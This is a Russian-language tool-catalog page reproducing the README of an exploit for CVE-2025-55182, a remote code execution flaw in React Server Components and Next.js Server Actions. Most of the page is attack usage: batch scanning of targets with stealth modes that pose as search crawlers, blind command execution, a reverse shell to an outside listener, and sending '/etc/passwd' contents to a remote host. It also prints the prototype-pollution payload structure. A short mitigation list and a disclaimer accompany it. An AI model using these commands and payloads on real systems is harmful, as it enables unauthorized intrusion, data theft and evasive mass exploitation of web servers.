Skip to content
KitploitKITPLOIT
ИнструментыБлог
Log in
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-55182-exp — CVE-2025-55182 инструмент эксплуатации удаленного выполнения кода для React Server Components | Kitploit
Инструменты/GitHubGitHub/spritualkb/cve-2025-55182-exp
Сканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийCTFТестирование на ПроникновениеОбучение и ОбразованиеRed TeamingИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHubspritualkb/cve-2025-55182-exp

CVE-2025-55182-exp

CVE-2025-55182 инструмент эксплуатации удаленного выполнения кода для React Server Components

4612109 месяцев назадПроверено Kitploit
Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-55182-exp

CVE Type Python License

🔥 Обзор

CVE-2025-55182 — это критическая уязвимость удаленного выполнения кода (RCE) в React Server Components (RSC), затрагивающая приложения Next.js, использующие App Router с Server Actions.

Уязвимость существует в процессе десериализации протокола Flight, что позволяет злоумышленникам добиться произвольного выполнения кода через загрязнение прототипа (prototype pollution).

⚠️ Отказ от ответственности

ТОЛЬКО ДЛЯ АВТОРИЗОВАННОГО ТЕСТИРОВАНИЯ БЕЗОПАСНОСТИ

Этот инструмент предоставляется только для образовательных целей и авторизованного тестирования на проникновение. Несанкционированный доступ к компьютерным системам незаконен. Любое незаконное или неавторизованное использование этого инструмента является исключительной ответственностью пользователя. Автор не несет никакой ответственности.

Пожалуйста, прочтите полный DISCLAIMER.md перед использованием этого инструмента.

Используя этот инструмент, вы соглашаетесь с тем, что:

  • Вы получили надлежащее разрешение на любое тестирование
  • Вы будете соблюдать все применимые законы и нормативные акты
  • Вы принимаете на себя полную ответственность за свои действия
  • Автор не несет ответственности за любое неправомерное использование

📋 Затронутые версии

КомпонентЗатронутые версии
react-server-dom-webpack19.0.0 - 19.2.0
Next.js15.x, 16.x (App Router + Server Actions)

🛠️ Установка

# Клонировать репозиторий
git clone https://github.com/Spritualkb/CVE-2025-55182-exp.git
cd CVE-2025-55182-exp

# Установить зависимости
pip install requests
pip install requests[socks]  # Для поддержки SOCKS5 прокси

📖 Использование

Проверить одиночную цель

python3 exploit.py http://target:3000 --check

Пакетное сканирование из файла

# Базовое пакетное сканирование
python3 exploit.py -f targets.txt --check

# С режимом скрытности и задержкой
python3 exploit.py -f targets.txt --check --stealth crawler --delay 2

# Сохранить уязвимые цели в файл
python3 exploit.py -f targets.txt --check -o vulnerable.txt

Выполнить команду (слепой RCE)

python3 exploit.py http://target:3000 -c "id"

Обратная оболочка (Reverse Shell)

# Сначала запустить слушатель
nc -lvnp 4444

# Выполнить обратную оболочку
python3 exploit.py http://target:3000 --revshell 10.0.0.1 4444

Извлечение вывода команды

# Запустить слушатель
nc -lvnp 4444

# Выполнить и извлечь вывод
python3 exploit.py http://target:3000 --exfil "cat /etc/passwd" 10.0.0.1 4444

Использование прокси

python3 exploit.py http://target:3000 --check --proxy socks5://127.0.0.1:1080

🎭 Режимы скрытности

РежимОписание
browserИмитирует запросы реального браузера (по умолчанию)
crawlerИмитирует запросы поисковых роботов (Googlebot, Baiduspider и т.д.)
securityИспользует User-Agentы сканеров безопасности

🔧 Параметры

ПараметрОписание
targetURL цели (например, http://localhost:3000)
-f, --fileФайл со списком URL целей (по одному на строку)
-o, --outputВыходной файл для уязвимых целей
-c, --commandКоманда для выполнения (слепая)
--checkПроверить на наличие уязвимости
--proxySOCKS5 прокси (например, socks5://127.0.0.1:1080)
--stealthРежим скрытности: browser, crawler, security
--delayЗадержка между запросами в секундах
--variantsИспользовать несколько вариантов полезной нагрузки для тщательной проверки
--revshell IP PORTОбратная оболочка на IP:PORT
--exfil CMD IP PORTВыполнить CMD и отправить вывод на IP:PORT
-t, --timeoutТайм-аут запроса в секундах (по умолчанию: 15)

🔬 Технические детали

Механизм уязвимости

Эксплойт использует загрязнение прототипа (prototype pollution) в десериализации протокола Flight:

  1. Загрязнение прототипа: Загрязняет Object.prototype.then через "$1:__proto__:then"
  2. Доступ к конструктору функции: Устанавливает _formData.get в конструктор Function через "$1:constructor:constructor"
  3. Внедрение кода: Внедряет вредоносный код через _prefix, который передается в Function()

Структура полезной нагрузки

{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "<вредоносный_код>",
    "_chunks": "$Q2",
    "_formData": {"get": "$1:constructor:constructor"}
  }
}

📁 Структура файлов

CVE-2025-55182-exp/
├── exploit.py      # Основной скрипт эксплойта
├── targets.txt     # Список URL целей (по одному на строку)
└── README.md       # Этот файл

📝 Формат targets.txt

# Комментарии начинаются с #
http://target1.com:3000
https://target2.com
target3.com:3000

🛡️ Средства защиты

  1. Обновите до последних исправленных версий react-server-dom-webpack и Next.js
  2. Внедрите валидацию ввода в Server Actions
  3. Используйте правила Web Application Firewall (WAF) для обнаружения вредоносных полезных нагрузок протокола Flight
  4. Отслеживайте необычные серверные ошибки (HTTP 500) с сообщениями, связанными с прототипами

📜 Лицензия

Этот проект лицензирован под лицензией MIT - см. файл LICENSE.


⚠️ Юридический отказ от ответственности

English

Terms of Use

By downloading, copying, installing, or using this software, you agree to be bound by the terms of this disclaimer.

Intended Purpose

This tool is designed exclusively for:

  • Authorized penetration testing
  • Security research and education
  • Vulnerability assessment with proper authorization
  • CTF (Capture The Flag) competitions
  • Personal lab environments

Prohibited Use

You SHALL NOT use this tool for:

  • Unauthorized access to computer systems
  • Any illegal activities
  • Attacking systems without explicit written permission
  • Causing damage to any systems or data
  • Any activities that violate local, state, national, or international laws

No Warranty

THIS SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED. THE AUTHOR(S) DISCLAIM ALL WARRANTIES, INCLUDING BUT NOT LIMITED TO:

  • MERCHANTABILITY
  • FITNESS FOR A PARTICULAR PURPOSE
  • NON-INFRINGEMENT

Limitation of Liability

IN NO EVENT SHALL THE AUTHOR(S) BE LIABLE FOR ANY:

  • Direct, indirect, incidental, special, exemplary, or consequential damages
  • Loss of data, profits, or business opportunities
  • Legal consequences arising from misuse of this tool

User Responsibility

Скачать инструмент